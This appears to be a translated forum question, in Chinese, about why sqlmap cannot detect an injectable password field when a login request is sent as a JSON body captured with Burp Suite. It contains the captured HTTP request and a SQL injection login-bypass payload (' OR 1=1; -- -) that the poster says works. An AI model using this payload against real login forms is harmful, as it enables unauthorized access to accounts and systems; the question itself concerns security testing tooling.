SQLMAP - 将JSON数据作为请求体提交

你好，我想在登录表单中进行SQL注入。

我使用BurpSuite拦截请求：

POST /xxxx/web/Login HTTP/1.1
Host: 10.0.0.70:42020
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/plain, */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Referer: http://xxxxxx.com/xxxxxx/
Content-Length: 44
origin: http://xxxxx.com
Connection: close

{"username”:"user",”password”:"pass"}

使用：

sqlmap -u requestFile

(其中requestFile是使用Burp截取的请求内容)

sqlmap无法找到可注入的password字段。

我确定它是可注入的，因为如果我输入以下密码：

' OR 1=1; -- -

我可以使用任何用户名登录

也尝试使用以下方式：

{"username”:*,”password”:*}

但是没有运气。

我做错了什么？